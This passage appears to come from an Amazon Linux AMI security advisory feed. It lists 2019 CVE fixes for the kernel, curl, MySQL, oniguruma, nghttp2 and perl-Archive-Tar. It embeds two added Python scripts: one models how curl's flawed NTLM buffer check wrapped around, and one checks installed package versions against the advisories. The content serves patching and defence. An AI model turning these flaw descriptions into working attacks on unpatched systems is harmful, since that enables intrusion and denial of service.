arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.90-8.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1287</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1287: medium priority package update for perl-Archive-Tar</title><issued date="2019-09-13 22:59:00" /><updated date="2019-09-18 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12015:
It was found that the Archive::Tar module did not properly sanitize symbolic links when extracting tar archives. An attacker, able to provide a specially crafted archive for processing, could use this flaw to write or overwrite arbitrary files in the context of the Perl interpreter.
1588760:
CVE-2018-12015 perl: Directory traversal in Archive::Tar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12015" title="" id="CVE-2018-12015" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Archive-Tar" version="1.92" release="3.6.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Archive-Tar-1.92-3.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1293</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1293: important priority package update for kernel</title><issued date="2019-09-25 23:01:00" /><updated date="2019-10-09 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14835:
A buffer overflow flaw was found in the way the Linux kernel&#039;s vhost functionality, which translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host while migration is underway could use this flaw to increase their privileges on the host.
99999:
CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration
CVE-2019-14821:
An out-of-bounds access issue was found in the way the Linux kernel&#039;s KVM hypervisor implements the Coalesced MMIO write operation. It operates on an MMIO ring buffer &#039;struct kvm_coalesced_mmio&#039; object, wherein the write indices &#039;ring-&gt;first&#039; and &#039;ring-&gt;last&#039; could be supplied by a host user-space process. An unprivileged host user or process with access to the &#039;/dev/kvm&#039; device could use this flaw to crash the host kernel, resulting in a denial of service or potentially escalating privileges on the system.
1746708:
CVE-2019-14821 Kernel: KVM: OOB memory access via mmio ring buffer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821" title="" id="CVE-2019-14821" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835" title="" id="CVE-2019-14835" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1294</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1294: medium priority package update for curl</title><issued date="2019-09-30 20:56:00" /><updated date="2019-10-02 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5482:
Heap buffer overflow in the TFTP protocol handler in cURL 7.19.4 to 7.65.3.
1749652:
CVE-2019-5482 curl: heap buffer overflow in function tftp_receive_packet()
CVE-2019-5481:
Double-free vulnerability in the FTP-kerberos code in cURL 7.52.0 to 7.65.3.
1749402:
CVE-2019-5481 curl: double free due to subsequent call of realloc()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5481" title="" id="CVE-2019-5481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5482" title="" id="CVE-2019-5482" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1295</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1295: medium priority package update for oniguruma</title><issued date="2019-09-30 
20:59:00" /><updated date="2019-10-02 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13225:
A NULL Pointer Dereference in match_at() in regexec.c in Oniguruma 6.9.2 allows attackers to potentially cause denial of service by providing a crafted regular expression. Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728965:
CVE-2019-13225 oniguruma: null-pointer dereference in match_at() in regexec.c
CVE-2019-13224:
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728970:
CVE-2019-13224 oniguruma: use-after-free in onig_new_deluxe() in regext.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13224" title="" id="CVE-2019-13224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13225" title="" id="CVE-2019-13225" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="oniguruma-devel" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-devel-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma-debuginfo" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-debuginfo-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma-devel" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-devel-5.9.6-4.4.amzn1.i686.rpm</filename></package><package name="oniguruma-debuginfo" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-debuginfo-5.9.6-4.4.amzn1.i686.rpm</filename></package><package name="oniguruma" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-5.9.6-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1296</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1296: medium priority package update for mysql56</title><issued date="2019-09-30 21:00:00" /><updated date="2019-10-02 23:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Audit). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1732032:
CVE-2019-2819 mysql: Server: Security: Audit unspecified vulnerability (CPU Jul 2019)
CVE-2019-2740:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: XML). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732000:
CVE-2019-2740 mysql: Server: XML unspecified vulnerability (CPU Jul 2019)
CVE-2019-2739:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1731999:
CVE-2019-2739 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2739" title="" id="CVE-2019-2739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2740" title="" id="CVE-2019-2740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2819" title="" id="CVE-2019-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-debuginfo" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.45" release="1.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.45" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-common-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.45-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1297</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1297: medium priority package update for mysql57</title><issued date="2019-09-30 21:02:00" /><updated date="2019-10-02 23:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3822:
libcurl versions from 7.36.0 to before 7.64.0 are vulnerable to a stack-based buffer overflow. The function creating an outgoing NTLM type-3 header (`lib/vauth/ntlm.c:Curl_auth_create_ntlm_type3_message()`), generates the request HTTP header contents based on previously received data. The check that exists to prevent the local buffer from getting overflowed is implemented wrongly (using unsigned math) and as such it does not prevent the overflow from happening. This output data can grow larger than the local buffer if very large &#039;nt response&#039; data is extracted from a previous NTLMv2 header provided by the malicious or broken HTTP server. Such a &#039;large value&#039; needs to be around 1000 bytes or more. The actual payload data copied to the target buffer comes from the NTLMv2 type-2 response header.
A stack-based buffer overflow was found in the way curl handled NTLMv2 type-3 headers. When connecting to a remote malicious server which uses NTLM authentication, the flaw could cause curl to crash.
1670254:
CVE-2019-3822 curl: NTLMv2 type-3 header stack buffer overflow
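The check the description above calls out, as an added Python model that is not curl's source code: the pre-fix guard subtracted the server-supplied response length from the buffer size in unsigned arithmetic, so a length larger than the buffer wrapped the difference to a huge value and the guard let the copy proceed. The model reduces values to the width of size_t to reproduce that wrap, sets the buffer size to an assumed 1024 bytes (the description only says around 1000 bytes or more), and contrasts the defective guard with an additive form that rejects the oversized response. The function names and the operand values are constructed for illustration.
<![CDATA[
```python
import ctypes

# Width of C's size_t on this machine; the guard in the description used unsigned operands.
SIZE_T_BITS = 8 * ctypes.sizeof(ctypes.c_size_t)
# Assumed size of the fixed local buffer (the advisory text gives no exact figure).
NTLM_BUFSIZE = 1024


def as_size_t(n):
    """Reduce an integer to the size_t range, reproducing C's unsigned wrap-around."""
    return n % (1 << SIZE_T_BITS)


def check_before_fix(size, ntresplen):
    """Model of the defective guard: 'size < NTLM_BUFSIZE - ntresplen' in unsigned math.
    Once ntresplen exceeds NTLM_BUFSIZE the subtraction wraps to a huge value, so the
    guard passes and the copy that follows it would run past the buffer."""
    return size < as_size_t(NTLM_BUFSIZE - ntresplen)


def check_after_fix(size, ntresplen):
    """Model of a corrected guard: add, then compare the sum against the buffer size.
    For operands far below 2**SIZE_T_BITS the sum cannot wrap, so an oversized
    response is rejected instead of copied."""
    return as_size_t(size + ntresplen) <= NTLM_BUFSIZE


def copy_would_overflow(size, ntresplen):
    """Ground truth: does writing ntresplen bytes at offset size exceed the buffer?"""
    return size + ntresplen > NTLM_BUFSIZE


def evaluate(size, ntresplen):
    """Return what each guard decides next to whether the copy really overflows."""
    return {
        "before_fix_allows": check_before_fix(size, ntresplen),
        "after_fix_allows": check_after_fix(size, ntresplen),
        "overflows": copy_would_overflow(size, ntresplen),
    }


if __name__ == "__main__":
    # Constructed operands: 'size' is the header length already built, 'ntresplen'
    # the nt response length taken from the server-supplied type-2 message.
    for size, ntresplen in ((100, 500), (900, 200), (100, 2000)):
        print(size, ntresplen, evaluate(size, ntresplen))
```
]]>
The middle case shows that the old guard did reject an overflow as long as the subtraction did not wrap; only a response length beyond the whole buffer defeated it, which is why the description speaks of a large value from a malicious or broken server.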
CVE-2019-2805:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732025:
CVE-2019-2805 mysql: Server: Parser unspecified vulnerability (CPU Jul 2019)
CVE-2019-2740:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: XML). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732000:
CVE-2019-2740 mysql: Server: XML unspecified vulnerability (CPU Jul 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2740" title="" id="CVE-2019-2740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2805" title="" id="CVE-2019-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3822" title="" id="CVE-2019-3822" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-embedded" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.27" release="1.13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.27" release="1.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-devel-5.7.27-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1298</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1298: important priority package update for nghttp2</title><issued date="2019-09-30 21:03:00" /><updated date="2019-10-02 22:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9513:
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.
1735741:
CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
CVE-2019-9511:
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1741860:
CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service
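As an added example that is not part of this advisory feed or of Amazon's tooling, the following Python script shows how a consumer of updateinfo.xml decides whether a host is still exposed: it parses the update, reference and package elements of an entry, then compares each fixed package's epoch, version and release against what is installed, using rpm's segment-wise version ordering. The advisory sample is a trimmed copy of the ALAS-2019-1298 entry above; the installed-package lines are constructed and stand in for what rpm -qa prints with a query format of name, epoch, version, release and arch.
<![CDATA[
```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed copy of the ALAS-2019-1298 entry's structure from this feed.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security">
<id>ALAS-2019-1298</id><severity>important</severity>
<references>
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9511" id="CVE-2019-9511" type="cve" />
<reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513" id="CVE-2019-9513" type="cve" />
</references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="nghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64">
<filename>Packages/nghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package>
<package name="libnghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64">
<filename>Packages/libnghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package>
</collection></pkglist></update>
</updates>"""

# Constructed sample of installed packages, one line per package in the order
# name, epoch, version, release, arch (rpm prints "(none)" for a missing epoch).
INSTALLED = """nghttp2 0 1.31.1 2.4.amzn1 x86_64
libnghttp2 (none) 1.31.1 2.5.amzn1 x86_64
openssl 1 1.0.2k 16.150.amzn1 x86_64"""

# rpm compares versions segment by segment: runs of digits, runs of letters,
# and the tilde; every other character only separates segments.
_SEGMENT = re.compile(r"\d+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Return -1, 0 or 1 ordering version strings a and b the way rpm does.
    Tilde sorts before anything, including end of string, so 1.0~rc1 is older
    than 1.0. The caret operator of newer rpm releases is left out here."""
    if a == b:
        return 0
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for i in range(max(len(sa), len(sb))):
        x = sa[i] if i < len(sa) else None
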